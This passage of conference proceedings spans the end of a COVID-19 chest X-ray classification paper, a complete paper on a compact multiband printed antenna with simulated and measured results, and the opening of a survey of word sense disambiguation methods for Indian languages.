outcomes of the trained system were also tested on various chest X-ray image
dimensions by varying the sizes of the training and evaluation databases; as a result,
fairly comparable outcomes were obtained. This experiment will go a big step toward
saving the lives of people. Data deficiency is the limitation for COVID-19
disease analysis.
Fig. 4 Performance of classification model on 224 × 224 × 3 data size

Table 1 Performance of the proposed architecture

Performance of the classification model on different data sizes
Data size   Training accuracy   Validation accuracy
100         0.9266              0.9155
150         0.9361              0.9242
224         0.9642              0.9434
250         0.9472              0.9396
300         0.9518              0.9366

Valuable progress can be made with improved access to data and pattern testing for
radiological evidence from COVID-19 positive people and non-
COVID-19 people in various places around the globe. For every patient, the dataset
includes details such as age, location, and physicians' remarks, so the classification
results were analyzed with the help of this information and are in good agreement with
it. We have obtained 99.00% sensitivity and 80.00% specificity. These results imply
that COVID-19 cases are identified accurately, but the accuracy for non-COVID-19 cases
is 80.00%; Table 1 and the graph show training and validation accuracy and loss.
Since the true negative rate is not satisfactory, we will overcome this in our future
research with a larger dataset.

5 Conclusion

We have shown how positive COVID-19 results can be recognized from a series of chest
X-ray images. We performed this experiment from scratch, which distinguishes it from
approaches that depend strongly on transfer learning. This research is to be expanded
in future to identify and classify COVID-19 images present in large X-ray image
datasets. Differentiating X-ray pictures which show COVID-19-related pneumonia from
non-COVID-19 pneumonia has been a big issue. Our next approach will tackle this
problem.

References

1. Cohen, J. P., Morrison, P., Dao, L., Roth, K., Duong, T. Q., & Ghassemi, M. (2020). Covid-
19 image data collection: Prospective predictions are the future. arXiv preprint arXiv:2006.
11988.
2. Brunetti, A., Carnimeo, L., Trotta, G. F., & Bevilacqua, V. (2019). Computer-assisted frame-
works for classification of liver, breast and blood neoplasias via neural networks: A survey
based on medical images. Neurocomputing, 335, 274–298.
3. Litjens, G., Kooi, T., Bejnordi, B. E., Setio, A. A. A., Ciompi, F., Ghafoorian, M., Van Der
Laak, J. A., Van Ginneken, B., & Sánchez, C. I. (2017). A survey on deep learning in medical
image analysis. Medical Image Analysis, 42, 60–88.
4. Asiri, N., Hussain, M., Al Adel, F., & Alzaidi, N. (2019). Deep learning based computer-aided
diagnosis systems for diabetic retinopathy-a survey. Artificial Intelligence in Medicine.
5. Zhou, T., Thung, K.-H., Zhu, X., & Shen, D. (2019). Effective feature learning and fusion
of multimodality data using stage-wise deep neural network for dementia diagnosis. Human
Brain Mapping, 40(3), 1001–1016. https://doi.org/10.1002/hbm.24428
6. Shickel, B., Tighe, P. J., Bihorac, A., & Rashidi, P. (2017). Deep EHR: a survey of recent
advances in deep learning techniques for electronic health record (EHR) analysis. IEEE Journal
of Biomedical and Health Informatics, 22(5), 1589–1604. https://doi.org/10.1109/JBHI.2017.
2767063 arXiv:1706.03446.
7. Jacobi, A., Chung, M., Bernheim, A., & Eber, C. (2020). Portable chest x-ray in coronavirus
disease-19 (covid-19): A pictorial review. Clinical Imaging.
8. Wang, S., & Summers, R. M. (2012). Machine learning and radiology. Medical Image Analysis,
16(5), 933–951.
9. Ker, J., Wang, L., Rao, J., & Lim, T. (2017). Deep learning applications in medical image
analysis. IEEE Access, 6, 9375–9389.
10. Mittal, A., Hooda, R., & Sofat, S. (2017). Lung field segmentation in chest radiographs: A
historical review, current status, and expectations from deep learning. IET Image Processing,
11, 937–952. https://doi.org/10.1049/iet-ipr.2016.0526
11. Bar, Y., Diamant, I., Wolf, L., Lieberman, S., Konen, E., & Greenspan, H. (2018). Chest
pathology identification using deep feature selection with non-medical training. Computer
Methods in Biomechanics and Biomedical Engineering: Imaging & Visualization, 6(3), 259–
263.
Low Cost Compact Multiband Printed
Antenna for Wireless Communication
Systems

Rachna Prabha, Pratibha Pandey, G. S. Tripathi, and Sudhanshu Verma

Abstract The proposed approach aims to design a compact multiband printed
antenna for applications in wireless communication. The basic aim of the antenna
design is to achieve wide bandwidth, low weight, and reduced size, which lowers cost
as well. The structure includes a main radiator, two sub-patches, and the ground plane,
which generates multiple frequency bands at 1.25, 1.75, 2.45, 3.95, and 5.1 GHz with
bandwidths of 45, 68, 112, 127, and 240 MHz, respectively.
The defected ground structure (DGS) has been used to improve the
parameters of the proposed antenna. The simulated and fabricated results exhibit a good
reflection coefficient, radiation pattern, and stable gain, so this antenna is applicable
for the DCS/Bluetooth/WLAN/WiMAX/IMT bands. The proposed antenna is designed
and analyzed using the Ansys HFSS 11.2 high-frequency structure simulation tool.
The simulated antenna is fabricated using a photolithographic method, and a vector
network analyzer is used to measure the fabricated prototype. The measured and
simulated results show good agreement. The proposed antenna operates at multiple
frequency bands ranging from 1.25 to 5.1 GHz, serving the Bluetooth system, the WLAN
systems at 2.12–2.45 GHz, the WiMAX system at 3.45–3.95 GHz, and the IMT system at
4.95–5.1 GHz.

Keywords Multiband · Wideband antenna · Wireless communication application · Slots

R. Prabha · G. S. Tripathi · S. Verma


Department of Electronics and Communication Engineering, Madan Mohan Malaviya University
of Technology, Gorakhpur, India
P. Pandey (B)
Department of Computer Science and Engineering, Institute of Engineering and Technology,
Lucknow, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 683
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_55

1 Introduction

The patch antenna, though inherently narrowband, can be used in the advancement
of wireless applications. These antennas are low profile, inexpensive, and easy to manufacture
by utilizing advanced printed circuit technology. They are adaptable with
regard to impedance, resonant frequency, and polarization when one specific mode
is chosen [1]. In [2, 3], a dipole antenna is used to design antennas for different frequency
bands. Slots of different shapes have been significant in mobile communications
[4, 5], and Quasi-Yagi antennas have been used in wireless communications
because of their broadband characteristics, good radiation performance, and
acceptable absolute gain (0–4.4 dBi) [6]. Different methods have been proposed to
achieve wireless communication applications using U and L slots [5, 7].
Omnidirectional radiation patterns and sustainable antenna gain have been achieved
over the operating bands [8, 9]. The proposed methods have been used for wide
bandwidth [10]. The defected ground structure (DGS) method has proved to
be very easy and useful for achieving additional resonances and bandwidth enhancement
while removing unwanted generated frequencies [11, 12]. Other practical
approaches have been considered to elevate the transmission capacity of the
antenna. A thicker substrate may be used as a substitute, but it will result in increasing
the amount of energy confined in the substrate [13]. Thus, different methods have been
used to achieve multiband antennas for particular resonant frequencies.
This paper presents a multiband antenna that generates different frequency bands
for DCS (1710–1880 MHz), IEEE 802.11b/g WLAN (2.45–2.54 GHz), WiMAX
(3.25–3.95 GHz), IEEE 802.11a WLAN, and IMT (5.1–5.95 GHz). A simple
design with dual patches, L slots, and a modified ground structure is used to generate
the multiband and compactness characteristics. The defected ground structure and a
circular slot are used to improve the proposed frequencies, radiation pattern,
and return loss of the presented antenna. The simulation process and fabricated results
show that the performance of the designed antenna is adequate and that it fits wireless
communication systems. The antenna configuration and simulation data are discussed in
Sects. 2 and 3, where the antenna parameters are carefully examined; Sect. 4
compares the fabricated and simulated results, which satisfy operational bands such
as the DCS/Bluetooth/WLAN/WiMAX/IMT bands. Further study includes making the antenna
reconfigurable using a varactor diode, so that this single antenna becomes applicable to
various applications without major alterations. The gain, bandwidth, and various other
parameters are enhanced using the defected ground structure (DGS), which also
quells surface wave propagation. These antennas can work over a compact, broad
frequency range.

2 Configuration of Antenna and Its Design Procedure

The structure of the simulated antenna, which has two patch elements and operates at
the 1.25, 1.75, 2.45, 3.39, and 5.1 GHz frequency bands, is presented in Fig. 1a, b.

Fig. 1 a Design of top of proposed antenna [2], b design of bottom of proposed antenna [2]

The proposed antenna consists of a main radiator, two sub-patch elements, a microstrip
line feed, and a DGS. The designed antenna is built on an FR-4 substrate with a thickness
of 2.57 mm and a relative permittivity of 4.4, and the overall volume is 50 × 50 × 2.57 mm.
Design Procedure
This multiband antenna is designed with a main radiator and two patch elements with an L
slot and a circular slot, giving a compact antenna. The main radiator generates
one resonance at 2.45 GHz, Patch 1 generates triple frequency bands,
and the combination of the main radiator, Patch 1, and Patch 2 generates frequency
bands at 1.25, 1.75, 2.45, 3.95, and 5.1 GHz with respective
bandwidths of 45, 68, 112, 127, and 240 MHz (Tables 1 and 2).
The L slot in Patch 1 is responsible for generating the triple band, and the
circular slot is used to improve the return loss of the antenna. The DGS is one of the
distinctive methods to reduce the antenna size: a defect shape etched on the ground
plane realizes the DGS, which creates a disturbance in the shielded
current distribution that depends on the dimensions and shape of the defect. The current
flow and input impedance of the antenna are influenced by this disturbed current
distribution, which may also affect the propagation and excitation of electromagnetic
waves through the substrate layer [12].

Table 1 Features of front face of proposed antenna (in mm) [2]


Lf Wf Wb W0 LP F1 D1 L2
14.6 3 27 50 4 3 12 12
F2 F2 F3 F4 L1 W1 D2 W2
2.2 2.4 2.4 3 12 8 7 8
UL1 Uw1 Ua UL2 UW2 Ub D3 Total volume 50 × 50 × 2.57 mm
8.6 5 −1 3.8 1.25 1 15
D1 D2 D3 r L2 W2 R
12 7 15 2 12 8 2

Table 2 Features of back face of proposed antenna (in mm) [14]


L3 L4 L5 W3 W4 W5 Total Volume 50 × 50 mm
18 18 5 10 5 5

Table 3 Multiple frequency bands obtained by the simulated antenna

S. No. Resonance Frequency (GHz) Bandwidth (MHz) Return loss (dB)
1 First 1.25 45 −15.37
2 Second 1.75 68 −21.37
3 Third 2.5 112 −16.43
4 Fourth 3.95 127 −23.42
5 Fifth 5.1 240 −13.22


3 Simulation and Measurement Results

Impedance Bandwidth for S11 ≤ −10 dB
The final simulation is performed with the HFSS software to determine the impedance bandwidth
(for S11 ≤ −10 dB) for various antenna dimensions. The simulation result in Fig. 2(a)
shows the S11 of the final design: using Patch 2 with the DGS, the five
frequency bands at 1.25, 1.75, 2.5, 3.95, and 5.1 GHz are generated, whereas without the
DGS all the frequency bands are shifted. This shows that the DGS is important for
good antenna performance. The multiple frequency bands obtained by the simulated
antenna are listed in Table 3; they cover bands such as
DCS/Bluetooth/WLAN/WiMAX/IMT.
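To illustrate how an impedance bandwidth of this kind can be read off a simulated S11 sweep (for example, one exported from HFSS as frequency/S11 pairs), a small sketch is given below; the toy data, the −10 dB threshold handling, and the use of NumPy are assumptions for illustration and do not reproduce the actual HFSS post-processing.

# Hypothetical sketch: extract the S11 <= -10 dB impedance bandwidth(s) from a swept S11 curve.
import numpy as np

def impedance_bandwidths(freq_ghz, s11_db, threshold_db=-10.0):
    # Return (f_low, f_high, bandwidth) for every contiguous band where S11 <= threshold.
    below = s11_db <= threshold_db
    bands, start = [], None
    for i, flag in enumerate(below):
        if flag and start is None:
            start = i
        elif not flag and start is not None:
            bands.append((freq_ghz[start], freq_ghz[i - 1], freq_ghz[i - 1] - freq_ghz[start]))
            start = None
    if start is not None:
        bands.append((freq_ghz[start], freq_ghz[-1], freq_ghz[-1] - freq_ghz[start]))
    return bands

# Toy sweep with a single resonance near 2.5 GHz (illustrative values only).
f = np.linspace(2.0, 3.0, 501)
s11 = -3.0 - 14.0 * np.exp(-((f - 2.5) / 0.05) ** 2)
for lo, hi, bw in impedance_bandwidths(f, s11):
    print(f"{lo:.3f}-{hi:.3f} GHz, bandwidth {bw * 1000:.0f} MHz")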
Radiation Pattern
The simulated antenna is analyzed for its radiation patterns at the multiple frequency
bands of 1.25, 1.75, 2.45, 3.95, and 5.1 GHz. The H-plane and E-plane radiation
patterns of the proposed simulated antenna have been generated. Both the H-plane
and E-plane patterns are very nearly omnidirectional, with similar shapes across the bands.

Fig. 2a Final simulated return loss [2]



Fig. 2b Radiation pattern at various frequencies of the simulated antenna: (a) 1.25 GHz, (b) 1.73 GHz, (c) 2.45 GHz, (d) 3.9 GHz, (e) 5.1 GHz [2]

Fig. 2c Simulated gain graph at various frequencies of the simulated antenna: (a) 1.25 GHz, (b) 1.73 GHz, (c) 2.45 GHz, (d) 3.9 GHz, (e) 5.1 GHz [2]

The total gain of the proposed simulated antenna is between 2 and 4 dB for the multiple
bands, as shown in Fig. 2(b). The loss induced in the FR-4 material is due to variation at
the higher resonant frequencies.
Simulated Gain
The antenna gain is one of the important parameters for examining the ability of the antenna
to radiate more or less in a given direction. In this design, the improvement in
antenna gain results from the defected ground structure and the various slots in the antenna.
The proposed antenna provides gains of −5.27 dB at 1.25 GHz, 2.60 dB at 1.75
GHz, 1.31 dB at 2.5 GHz, 0.377 dB at 3.95 GHz, and −0.1419 dB at 5.1 GHz. The
second important parameter of the antenna is its efficiency, which shows how efficiently
the antenna works (Fig. 2(c)).

4 Fabricated Multiband Printed Antenna

The presented antenna has different slots and a DGS covering the DCS, Bluetooth,
WLAN, WiMAX, and IMT bands. The top and bottom views of the fabricated antenna
are presented in Fig. 3. An L slot and an I slot are etched on the front face, while the back
face of the fabricated antenna contains the H-shaped DGS, as shown in the figure below.
The fabricated structure closely reproduces the simulated layout of the proposed antenna.
This fabricated multiband antenna is very useful for wireless communication systems.
The antenna is tested using a vector network analyzer (VNA) over a frequency range of
1–6 GHz. Table 4 compares the basic parameters of the simulated and fabricated results.

Fig. 3 Front and back view of fabricated antenna

Table 4 Comparison between parameters of simulated and fabricated results

Parameter | Simulated results | Fabricated results
Frequency bands | 1.25, 1.75, 2.45, 3.95, 5.1 GHz | 1.31, 1.8, 2.56, 4.01, 5.26 GHz
Bandwidth | 45, 68, 112, 127, 240 MHz | 40, 50, 90, 112, 205 MHz
Return loss (dB) | −15.37, −21.37, −16.43, −23.42, −13.22 | −13.74, −15.6, −13.1, −20.2, −10.1
Application | DCS, Bluetooth, WLAN, WiMAX, IMT bands | DCS, Bluetooth, WLAN, IMT bands

5 Conclusion

This paper presented the design of a compact wideband and multiband antenna
for wireless communication systems such as the DCS, Bluetooth, WLAN, WiMAX, and
IMT bands. The multiband frequencies can be individually controlled using the L slots,
I slots, and defected ground structure without affecting the wideband performance.
The results of the proposed antenna show good performance with regard
to return loss, radiation pattern, gain, and efficiency. The primary features of the presented
multiband antenna include its low profile, light weight, and simple fabrication, making the
design suitable for future smaller wireless communication systems. The design procedure
of the antenna has been presented in detail. The inclusion of a varactor or tunnel diode
in the design would make the antenna reconfigurable, enabling the five bands to be
independently tuned and electrically controlled over a broad frequency range. The proposed
design has been fabricated and measured, and the measured and simulated results show
good agreement with each other.

References

1. Liu, W.-C., Wu, C.-M., & Dai, Y. (2011). Design of triple-frequency microstrip-fed monopole
antenna using defected ground structure. IEEE Transactions on Antennas and Propagation,
59(7).
2. Prabha, R., Tripathi, G. S., & Verma, S. (2016). Design of compact wideband and multi-
band antenna for wireless communication systems. In International conference on advances
in computing, control and communication technology in University of Allahabad, pp 79–85.
3. Abutarboush, H. F., Nilavalan, R., Cheung, S. W., et al. (2012). A reconfigurable wideband and
multiband antenna using dual-patch elements for compact wireless devices. IEEE Transactions
on Antennas and Propagation, 60(1).
4. Lee, Y.-C., & Sun, J.-S. (2009). A new printed antenna for multiband wireless applications.
IEEE Antennas and Wireless Propagation Letters, 8.
5. Huang, C.-Y., & Yu, E.-Z. (2011). A slot-monopole antenna for dual-band WLAN applications.
IEEE Antennas and Wireless Propagation Letters, 10.
6. Wu, Z., Li, L., Chen, X., & Li, K. Dual-band antenna integrating with rectangular mushroom-
like superstrate for WLAN applications. IEEE Antennas and Wireless Propagation Letters.
https://doi.org/10.1109/LAWP.2015.2504558.
7. Yu, Y.-C., & Tarng, J.-H. (2009). A novel modified multiband planar inverted-F antenna. IEEE
Antennas and Wireless Propagation Letters, 8.
8. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U-shaped slots for WLAN/WiMAX applications. IEEE Antennas Wireless
Propagation Letters, 13, 388–391.
9. Chen, H., Yang, X., Yin, Y. Z., Fan, S. T., & Wu, J. J. (2013). Triband planar monopole antenna
with compact radiator for WLAN/WiMAX applications. IEEE Antennas Wireless Propagation
Letters, 12, 1440–1443.
10. Li, B., Hong, J., & Wang, B. (2012). Switched band-notched UWB/dual-band WLAN slot
antenna with inverted S-shaped slots. IEEE Antennas and Wireless Propagation Letters, 11.
11. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U shaped slots for WLAN/WiMAX applications. IEEE Antennas and
Wireless Propagation Letters, 13.
12. Colburn, J. S., & Rahmat-Samii, Y. (1999). Patch antennas on externally perforated high
dielectric constant substrates. IEEE Transactions on Antennas and Propagation, 47(12).
13. Kumar, C., & Guha, D. (2012). Nature of cross-polarized radiations from probe-fed circular
microstrip antennas and their suppression using different geometries of defected ground
structure (DGS). IEEE Transactions on Antennas and Propagation, 60(1).
14. Abutarboush, H. F., Nilavalan, R., & Nasr, K. M. (2012). Compact printed multiband antenna
with independent setting suitable for fixed and reconfigurable wireless communication systems.
IEEE Transactions on Antennas and Propagation, 60(8).
A Detailed Analysis of Word Sense
Disambiguation Algorithms
and Approaches for Indian Languages

Archana Sachindeo Maurya and Promila Bahadur

Abstract Word sense disambiguation (WSD) is a difficult research problem in
computational linguistics that was recognized at the commencement
of scientific interest in machine translation (MT) and artificial intelligence
(AI). WSD is the process of detecting the right meaning of a word with various
senses and requires in-depth knowledge of various sources. Phrases that contain
multi-functional words can present different parsing structures and provoke different
understandings, and are referred to as ambiguous. Much effort has been devoted to
resolving this problem for machine translation, and the work is still continuing.
Numerous techniques have been used in the disambiguation process and implemented in
various frameworks for almost all languages. This article presents a detailed analysis
of WSD algorithms and the different approaches adopted by researchers in their work
on many Indian languages. In this paper, we put forward an examination of the
supervised, unsupervised, and knowledge-based approaches and algorithms
available for word sense disambiguation.

Keywords Ambiguity · Word sense disambiguation · Machine translation (MT)

1 Introduction

In all major languages worldwide, there are countless words that have different
meanings in different contexts. These words are referred to as "ambiguous
words," and the existence of such words is referred to as "ambiguity." Almost all
natural languages suffer from different kinds of ambiguities, and English is no exception.
To translate from English into other languages, or from other languages into English,
these ambiguous words must be disambiguated correctly to obtain the relevant translation
into the target language. Disambiguation of the senses is the process that resolves the
problem of ambiguity.

A. S. Maurya (B) · P. Bahadur


Institute of Technology, SRMU, Lucknow, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 693
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_56

Therefore, WSD is the process of selecting the exact sense of an ambiguous word in a
given context.
The ambiguity issue is an open challenge in the natural language processing
(NLP) field, and WSD is an important task for solving it. WSD is crucial
for several real-life applications such as machine translation (MT), information extraction
(IE), information retrieval (IR), and speech recognition (SR).

1.1 Machine Translation

Machine translation (MT) has been one of the most significant applications of WSD
techniques. Machine translation [1] is a process whereby one language is converted into
another language. The first language is referred to as the source language, while the
second language is referred to as the target language. Natural languages appear
as written text and speech data, and this text or speech data can be translated from the
source language to the target language using machine translation (MT).

1.2 Ambiguity and Its Classification

Ambiguity refers to the presence of words in a sentence that have more than
one meaning or interpretation. By studying various works on ambiguity, we have
found that ambiguity in language can be classified into five broad categories, which
are depicted in Fig. 1. Detailed information on the various types of ambiguities, with
examples and explanations, is outlined in Table 1.

Fig. 1 Different categories of ambiguity: lexical, syntactic, pragmatic, semantic, and part-of-speech ambiguity



Fig. 2 Applications of word sense disambiguation (WSD): machine translation, retrieval of information, and extraction of information

Fig. 3 Two cases of the parse tree of example 1: Case 1, in which "leaves" is treated as a verb, and Case 2, in which "leaves" is treated as a noun

2 Word Sense Disambiguation (WSD)

Word sense disambiguation (WSD) is the task of selecting, by considering its
context, the best sense of an ambiguous word (a word with different meanings)
in a particular use of that word. WSD is viewed as an AI-complete
problem, a task whose solution must be at least as complex as the most demanding
problems of artificial intelligence [5]. This issue consequently has to be tackled
during the translation from the source language to the target language. The
technique of finding the specific meaning of an ambiguous word [5, 6] from a
predefined set of senses is word sense disambiguation (WSD).

Table 1 Various sorts of ambiguities, including examples and explanations

1. Lexical ambiguity. Definition: it happens when a single word has more than one meaning, or when a word can be interpreted in multiple senses [2]. Example: "Features of a bat". Explanation: in this phrase the word "bat" has two meanings, either a "mammal/bird" or a "cricket bat".
2. Semantic ambiguity. Definition: it is also referred to as polysemy; it happens when a sentence has more than one way of being understood in context, even though it contains no lexical or structural ambiguity [3]. Example 1: "The cat is chasing the rat"; Example 2: "The cat has been domesticated for 10,000 years". Explanation: in the first example "The cat" refers to a specific cat, and in the second example it refers to the species "cat".
3. Pragmatic ambiguity. Definition: this happens when a sentence has multiple meanings in context; it can be categorized as ambiguity in discourse, ambiguity in presuppositions, and referential ambiguity [4]. Example: "I like you too". Explanation: this phrase has multiple interpretations, such as Interpretation 1: I like you (just as you like me); Interpretation 2: I like you (like some other person does).
4. Syntactic ambiguity. Definition: in any expression, syntactic ambiguity exists whenever a sentence can be understood as having two or more distinct meanings because of the order of the words within the sentence [4]. Example: "The man saw the boy with the binoculars". Explanation: this phrase is ambiguous because it is not clear whether the man used the binoculars to see the boy or the boy was using the binoculars when the man saw him.
5. Parts-of-speech (POS) ambiguity. Definition: in this kind of ambiguity, the same form of a word can be a noun or a verb, plural or singular, and so on [4]. Example: "The red leaves are very shiny" and "The train leaves at 2 p.m." Explanation: in the first phrase the word "leaves" means "leaves of a tree", which is a noun, and in the second phrase "leaves" means "the departing of a train", which is a verb; this means that the word can be labeled as different parts of speech in different phrases.

2.1 Applications of Disambiguation Techniques

Machine translation is one of the greatest and principal applications of WSD, although
the disambiguation process is common to all natural language processing (NLP)
applications. A few applications are described here.
Machine Translation (MT): The WSD process plays an important role in MT for
those words that have more than one translation for their different meanings. In
English-Hindi translation, the word leaves in the English sentences "The leaves
are falling from the tree" and "The train leaves at two pm" could be translated as
either the leaf of the tree or the departure of the train. To solve
this problem, WSD algorithms are used to find the most appropriate sense of the word
leaves.
Retrieval of Information (IR): Resolving the ambiguity in a query plays
the most significant role in the retrieval of information (IR). In certain queries,
ambiguity must be overcome. Information retrieval is an important application
of WSD: WSD algorithms are applied to retrieve documents that are
related to the specific query. Example: web search engines.
Information Extraction (IE): WSD plays a significant role in information extraction
and text mining; in many applications, disambiguation techniques are
required for precise text analysis. Owing to the important role of senses and
synonyms in IE, semantic analysis is very useful [7].

2.2 Organization of the Paper

The remainder of the paper, Sects. 3–8, is organized as follows:

Section 3: This section provides a relative analysis of WSD and directions for
future research.
Section 4: In this section, our proposed work is described.
Section 5: The different approaches to WSD are discussed in detail.
Section 6: This section presents a summary of WSD approaches and
algorithms with their benefits and drawbacks in Table 2.
Section 7: The review of the literature on the different WSD approaches used by
researchers for various Indian languages is described here, and a comparative
analysis is presented in Table 3 along with the reported accuracy percentages.
Section 8: This section contains the conclusion of the paper.

3 Relative Analysis on WSD and Directions for Future


Research

A lot of work has been done on WSD; some studies report the precision of numerous
strategies used in different languages, and a few give surveys of WSD approaches. On the
basis of the techniques used and the different sources of knowledge used in disambiguation,
a classification of WSD algorithms is given in [8]. WSD surveys have been conducted
by various researchers, together with comprehensive reports on algorithms and methods to
solve the ambiguity problem in particular languages. A literature analysis of
WSD-based work done by the investigators, their conclusions, and the scope for
upcoming research is presented in detail below:
(a) A novel context clustering scheme is presented in a Bayesian
framework. The algorithm is based on the similarities between context pairs.
A maximum entropy model is then trained to represent the probability
distribution of context-pair similarities based on heterogeneous features [9].
(b) A Naïve Bayesian supervised learning approach with rich features is used.
A forward sequential selection algorithm is used to choose the best set of
features, and high accuracy is obtained with this method. Part-of-speech
information can be checked to determine whether it is useful in cases where there
is not enough training data [10].
(c) A hybrid training method is used for better performance than the supervised and
unsupervised approaches alone. The unsupervised method gives 63% accuracy,
the supervised method 76%, and the hybrid method 80%; the authors therefore
conclude that accuracy is improved by the hybrid approach.
They also state that if the target words are disambiguated correctly,
the system gives a 100% accuracy result [11].
(d) An unsupervised graph-based approach is used. After processing the sentence,
it finds the ambiguous words and creates a virtual graph of vectors. From
the labeled nodes of the graph, similarity can be calculated, and on the basis of the

Table 2 Comparison analysis of WSD algorithms and approaches with respect to their benefits and
drawbacks

Knowledge-based approach
Lesk algorithm. Benefits: the improved Lesk algorithm has the advantage of being much quicker than the original Lesk algorithm and having a lower computational complexity. Drawbacks: it requires massive knowledge sources, and the original method cannot basically be used on its own.
Semantic similarity. Benefits: words with the smallest distance between them are semantically related. Drawbacks: when the uniform-distance problem arises, any two concepts connected by paths of the same length have the same semantic similarity.
Preferences for selection. Benefits: reduces the heavy human time cost of manual tagging. Drawbacks: the grammatical relationship between selected words or phrases can be hard to establish.
Heuristic method. Benefits: potential issues can be examined after conducting usability testing. Drawbacks: it requires knowledge as well as experience and is also more expensive for designers.

Supervised approach
Decision list. Benefits: this approach produces the best results since it can be used in a series of experiments to arrive at the desired outcome. Drawbacks: an over-fitting problem occurs, meaning that error appears when a function fits too closely to a limited set of data points.
Decision tree. Benefits: an effective method that is easy to understand. Drawbacks: maintenance is a more complicated and difficult task.
Naïve Bayes. Benefits: a very simple method that is easy to implement; it is also very fast, requires a smaller amount of training data, and calculates probability likelihoods. Drawbacks: problems occur due to a lack of data.
Neural network. Benefits: ability to work with incomplete knowledge. Drawbacks: this method is hardware dependent and also requires a parallel processing unit.
Example-based method. Benefits: develops a long-term knowledge-holding system. Drawbacks: poor potential performance.
Support vector machine (SVM). Benefits: it uses the kernel trick, and the over-fitting problem can be reduced owing to the regularization parameter. Drawbacks: lack of transparency of the results.

Unsupervised approach
Context clustering/word clustering. Benefits: it can be used without any prior experience as a basis or without developing corpora. Drawbacks: the issue of selecting suitable document features to use in clustering.
Co-occurrence graph. Benefits: robust features can be generated by assembling small features. Drawbacks: bookmarks cannot be included.

similarity value a sense label can be selected. This is a new approach for Indian
languages and can be applied to them for better accuracy and adaptability [12].
(e) For the purpose of disambiguation, a topic model is used. The most basic
example of a topic model is latent Dirichlet allocation (LDA), which is based on the
key hypothesis that documents deal with a number of topics. A probabilistic
graphical model is presented. The system uses the entire document as
the context for disambiguation, since this model scales linearly with the
number of words in the context. It yields a better WSD system than the
leading knowledge-based systems on a set of benchmark datasets. This model may also be
used for supervised WSD methods [13].
(f) A detailed survey report is presented on various WSD approaches and their benefits
and drawbacks. These approaches have been implemented successfully in many languages.
Finally, a successful WSD algorithm can be built by considering the
following factors: the neighbors of a word with the same meaning tend to be the
same; some approaches always run quickly but with accuracy limitations;
and the majority of those approaches have been implemented successfully for
a variety of languages [14].
(g) A knowledge-based WSD approach is used, and the framework has only four components:
semantic path exploration, relation extraction, similarity calculation, and semantic space
exploration. On the other three datasets, this method outperforms all other schemes.
In terms of POS disambiguation, this method performs well on nouns and verbs,
which are the main components of any sentence. The performance of noun
disambiguation is equal to that of the best supervised method, and the performance
of verb disambiguation is superior to that of all other knowledge-based systems [15].
(h) Dynamic programming (DP) is used, breaking the problem down into
a series of smaller problems, to find

Table 3 Summary of WSD techniques used in different Indian languages with accuracy percentage

Used algorithm type | Author | Year | WSD language | Performance in %
Knowledge-based approach | Haroon [38] | 2010 | Malayalam | 81.3%
Modified Lesk's algorithm | Kumar and Khanna [39] | 2011 | Punjabi | 75%
Unsupervised learning method with graph-based approach | Das and Sarkar [40] | 2013 | Bengali | 60%
Decision list | Parameswarappa et al. [41] | 2013 | Kannada | Satisfactory
Genetic algorithm | Kumari and Singh [42] | 2013 | Hindi | 91.6%
Decision tree based WSD system | Sivaji et al. [27] | 2014 | Manipuri | 71.75%
Support vector machine | Anand Kumar et al. [43] | 2014 | Tamil | 91.6%
Naïve Bayes classification | Pal et al. [44] | 2015 | Bengali | 80–85%
Context similarity unsupervised approach | Sankar et al. [45] | 2016 | Malayalam | 72%
Genetic algorithm | Vaishnav [46] | 2017 | Gujarati | Satisfactory
Lesk algorithm | Shashank and Kallimani [47] | 2017 | Kannada | Satisfactory
Naïve Bayes method | pal Singh and Kumar [48] | 2018 | Punjabi | 81–89% for both models
Naïve Bayes approach | Borah et al. [49] | 2019 | Assamese | 91.11%
Knowledge-based approach | Vaishnav and Sajja [50] | 2019 | Gujarati | Satisfactory
Deep learning neural network | pal Singh and Kumar [51] | 2020 | Punjabi | 91–97%

the optimal subset that contains the most distinct set in the shortest amount of
time, while maintaining the same or better accuracy than the original set. This
algorithm can be used with any ensemble approach and real-world examples, and
it can even be combined with other ensemble methods such as boosting. DPED can
also be integrated with bagging and boosting algorithms to enhance
efficiency on big datasets and multi-class problems [16].
(i) They create a conceptual framework based on the likelihood of occurrence of events
of different natures and their potential impact. The conceptual analysis can be
applied in various other case studies involving multiple sources; as a
result, taking full advantage of the sources is very difficult, and a quantitative review
technique would help to enhance it. Further advancement is justified by the
association between the degree of uncertainty and its taxonomy and management.
Relevant sources can often be envisaged by assigning weights to different interpretations
on the basis of scenario reliability [17].
(j) SensEmBERT is an effective method in both English and multilingual WSD
tasks. Going forward, the authors will work to cover other POS tags (verbs, adjectives, and
adverbs) by tapping into other sources of knowledge. Sense embeddings can
also be used to create high-quality silver data for WSD in multiple languages
[18].
(k) A Word-in-Context (WiC) model is used. The authors present ARES, a semi-supervised
approach for producing sense embeddings in English and across
different languages. ARES couples the information within sense-annotated corpora,
created automatically by means of a cluster-based algorithm, with a lexical knowledge
base, resulting in high-quality latent representations of the concepts in that knowledge
base. Going forward, they will apply the information obtained from these embeddings
to other downstream tasks in multilingual semantics and cross-lingual semantic parsing [19].

4 Proposed Work

We infer from this comparative evaluation that such algorithms can be applied to
multiple languages and to various different data sets, whose sizes can also differ.
There are only a few Indian languages in which WSD experiments have been
implemented, such as Hindi, Marathi, Gujarati, Bengali, Punjabi, Kannada,
etc. Our approach aims to provide a better result for resolving parts-of-speech
(POS) ambiguity in English-to-Sanskrit [20] machine translation
using a supervised learning method.

Example
1. Train leaves at two p.m. (a verb)
2. Leaves are falling from the tree. (a noun)

The parse tree for the sentence "Train leaves at 2 pm" is presented in Fig. 3; it
covers two cases. The sentence is grammatically correct, but during morphological analysis
the ambiguity lies in whether the system treats "leaves" as a noun or a verb, given the
information provided by the bilingual lexicon/dictionary. Morphological analysis is a
method for identifying and investigating the total set of all possible relationships
